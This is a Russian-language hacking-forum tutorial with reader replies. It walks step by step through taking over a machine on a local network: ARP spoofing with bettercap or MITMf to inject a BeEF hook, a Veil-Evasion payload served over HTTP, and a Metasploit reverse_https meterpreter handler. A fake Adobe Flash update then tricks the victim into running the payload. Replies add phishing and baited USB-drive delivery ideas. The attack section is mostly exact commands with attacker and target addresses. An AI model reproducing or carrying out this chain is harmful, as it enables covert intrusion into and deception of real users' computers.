Соц.инженерия или как доставить полезную нагрузку

Всем привет.
Сегодня я хочу рассказать как можно используя связку инструментов, получить доступ к удаленной машине в сегменте локальной сети.
Данный материал предназначен для аудитории которая владеет навыками пользователя в среде линукс, так же есть понимания топологии сетей.
Для этого нам понадобиться:
1.Veil-Evasion.
2.Metasploit.
3.Beef.
4 Bettercap ( Mitmf тоже подойдет ).
Я не буду подробно останавливаться на установке и использовании Veil-Evasion ,
кто не знаком с данным инструментом, у нас на форуме эту тему подробно описали,вот ссылка:
https://codeby.net/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/
Metasploit и Beef стоят в самом дистрибутиве кали.
Bettercap устанавливаем командой apt-get install bettercap
Кто предпочитает mitmf, то иногда связка mitmf+Beef не корректно работает:

заплатка.png


лечиться это следующей заплаткой
easy_install -U pip
pip install Twisted==15.5.0


Отдельно хочу отметить инструмент для тестирования на проникновения Beef,
это сокращение от Browser Exploitation Framework (фреймворк эксплуатации браузеров).
Он позволяет выжать максимум из внедрения JS-кода.
Я считаю что на данный момент это лучший инструмент для проведения XSS-атак.

А сейчас давайте приступим к практической реализации.
1. Запускаем фраемворк Beef , его можно запустить как из меню так и из консоли, если запускать из консоли то заходим в каталог используя следующую команду:

cd /usr/share/beef-xss/
./beef

запус beef.png

Консоль не закрываем!
Далее открываем браузер и в строке вводим следующий адрес

http://localhost:3000/ui/authentication

Login: beef
Pasword: beef

воод пароля beef.png


после не хитрых манипуляций попадаем в графический интерфейс управления фраемворка.


1111.png


2.Далее открываем новую консоль и запускаем bettercap, в моем случае строка будет выглядеть следующим образом:

sudo bettercap -T 192.168.0.109 --proxy-module injectjs --js-url "http://192.168.0.102:3000/hook.js"

запуск bettercapa.png


где адрес 192.168.0.109 -эта машина в отношении которой производиться тестирование.
адрес 192.168.0.102 -это адрес машины с которой мы атакуем.
Консоль не закрываем!

Если кто не знает, как узнать свой ip, то делается это командой ifconfig.

ifconfig.png


Кто предпочитает пользоваться инструментом mitmf, то строка будет выглядеть следующим образом:

python mitmf.py -i wlan0 --target 192.168.0.109 --gateway 192.168.0.15 --arp --spoof --inject --js-url http://192.168.0.102:3000/hook.js

wlan0-это интерфейс
192.168.0.15 это адрес роутера, узнать его можно командой route -n

routen.png


Далее нам нужно сгенерировать полезную нагрузку, для этого будем использовать инструмент Veil-Evasion.
Еще раз повторюсь, по данной ссылке:
https://codeby.net/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/
вы можете ознакомится с установкой, а так же, там подробно описано как создать нужный нам файл.

После того как сгенерировали файл , нам нужно запустить сервер.
я это делал в том же каталоге где была сгенерирована полезная нагрузка, следующей командой

python -m SimpleHTTPServer 8081
консоль не закрываем!

Где 8081 это порт на котором у нас будет крутится сервер.(порт выбирайте произвольно, не обязательно брать такой как у меня.)
Следующим шагом будет запуск метасплойта,(нужно же нам принимать чем то данные, от полезной нагрузки).:rolleyes:
Это можно сделать двумя способами, самым простым на мой взгляд это в новой консоли написать строчку следующего содержания,в моем случае это будет выглядеть так
msfconsole -r /usr/share/veil-output/handlers/load_flash_handler.rc

Для тех кто не ищет легких путей:
запускаем метасплойт командой: msfconsole
далее вводим:

use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.0.102
(свой внутренний IP )
set LPORT 4444 (вводим порт на котором будет слушаться полезная нагрузка, не путать с портом сервера!!!)
exploit
Консоль не закрываем!
ПО ИТОГУ У НАС ДОЛЖНО БЫТЬ ОТКРЫТЫ ЧЕТЫРЕ КОНСОЛИ.

Сейчас давайте вернемся к нашему фраемворку Beef, перед нами как вы видите, расположен графический интерфейс.
Обратите внимание на крайнюю колонку ,слева сверху, там отображаются ip машин у которых браузеры, уязвимы к атаке xcc, и наш beef их подцепил.
Дальше, мы выбираем наш подцепленный браузер и переходим во вкладку Commands.

beef левая колонка.png


Находим там пункт Social Engineering, далее Fake Flash Update, кликаем на нем, и перед нами откроется окно где вместо ip по умолчанию, нужно будет вставить наши данные.
В моем случае это выглядит таким образом :
http://192.168.0.102:3000/adobe/flash_update.png
http://192.168.0.102:8081/flash_update12.exe

последняя фаза beef.png


Далее в нижнем правом углу нажимаем на кнопку Execute.
Если вы все сделали верно, то на машине у жерты появиться окно для обновления Adobe Flash Player.Как только жертва запустит обновление, у нас откроется сессия.

На этом пока всё, спасибо за внимание. :)
 
Последнее редактирование:
переустановка оси.:)
 
переустановка оси.:)

Ничего конечно сказать не хочу плохого, но может кому полезно будет. Именно с Пэррот ОС я стал испытывать такие проблемы, и не только с beef, SET , другие приложения. В кали - все стабильно, в Пэррот как то все шатко =) Сейчас проверили на 4 машинах со свежей установкой Кали - все четко, поставил Пэррот на другую тачку - тоже самое - не завелось =) Так то как то =)
 
  • Нравится
Реакции: kot-gor
Нехватило места на 8 гиговой флехе для установки обновлений:( персистенс раздел создал на ней все б нормально, только очень странно что 4 гига кончаются после скачивания мб 500... то есть скачал программу с этого "курса" установил и места почти не осталось...как можно проверить сколько места на зашифрованном разделе?в gparted показывает что то около 4 гигов насколько я помню, а так чет кажется меньше. Могут ли обновы в 3 -4 гига уложится?или место больше нужно?
 
огромное спасибо за статью;)
 
Спасибо за статью) Дополню пожалуй коротким своим видосом про интеграцию BeeF и Metasploit
Возможно пригодится
 
Все опробованно, доступно и понятно, еще раз спасибо.
Подскажите, где можно покурить про способы доставке полезной нагрузки на целевой хост.
И оффтоп, может кто-нибудь подскажет, бескрайние просторы пестрят объявлениями о взломе почтовых ящиков типа gmail (визуально не лохотрон, т.к. ресурсы с такими объявлениями достойны уважения и врятли позволят себе постить разводки), как это вообще возможно, ведь это не подбор и не взлом хоста с которого клиент посещает ресурс, неужели рассылка писем с просьбой ввести пароль :)
Кстати обратил внимание на то, что одним из важных условий является не обращение к нескольким ребятам для одновременного взлома.
 
Фишинг имееет место быть., как один из вариантов ,Что касается о способах доставки полезной нагрузки , то на этом форуме информации предостаточно.
 
  • Нравится
Реакции: ghostphisher
про доставку на целевй хост - можно воспользоваться старыми методами в нектоорых случаях аля забыть диск в нужном месте с надписю маркером Мои фото Маша.М или выслать подарочную флешку на 256 мб забрендированную под фирменную.
 
забыть диск и выслать флешку
Ну это тоже социалка, мне бы хотелось потестить методы получения сессии через уязвимости на целевой машине, которые исключают адекватное или неадекватное поведение конечного пользователя, метод с flash крайне понравился, но это 50/50, все зависит от чайниковости пользователя.
 
А зачем вообще mitmf или bettercap прикручивать?! Взять JS'ник и сверстать прямо на форму. service apache2 start. И всё, Далее о Veil Evaison - к сожалению проект сей исчерпал себя и палится всем, чем только можно даже браузером хрома. Ну и в довесок, не проще ли юзать Java applets? А в целом статья очень даже хороша.

Ах да всё это прекрасно работает не в локалке, если белый ip.
 
  • Нравится
Реакции: jhon88 и ghostphisher
А зачем вообще mitmf или bettercap прикручивать?! Взять JS'ник и сверстать прямо на форму. service apache2 start. И всё, Далее о Veil Evaison - к сожалению проект сей исчерпал себя и палится всем, чем только можно даже браузером хрома. Ну и в довесок, не проще ли юзать Java applets? А в целом статья очень даже хороша.

Ах да всё это прекрасно работает не в локалке, если белый ip.
в локалке тоже прекрасно все работает , скажу более эта техника рассматривалась именно для сегмента локальной сети, поэтому и применяется mitmf или bettercap..Если рассматривать внешнюю сеть , то да , нужен белый ip, и немного по другому все сделать...
 
Последнее редактирование:
  • Нравится
Реакции: ghostphisher
ребят, я может еще не особо силен в терминологии... но правильно ли я понимаю: белый ip - это статический ip от провайдера за который приходится доплачивать в виде 100рЭ.... Или же это какой-то другой ip?
[doublepost=1487680262,1487680196][/doublepost]з,Ы, статья супер! будем учиться)
 
ребят, я может еще не особо силен в терминологии... но правильно ли я понимаю: белый ip - это статический ip от провайдера за который приходится доплачивать в виде 100рЭ.... Или же это какой-то другой ip?
[doublepost=1487680262,1487680196][/doublepost]з,Ы, статья супер! будем учиться)
Белый ип тот что видно из интернета.
 
СОбирался писать подобное но в качестве проги для лже обновления юзать пэинт
 
Нет. Динамическим былый IP может быть точно с тем же успехом
тогда мне непонятен термин "серый IP" ... :-\ Динамический в любом случае не постоянный... если подключение к сети каждый раз разное, то и IP будет разным...
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab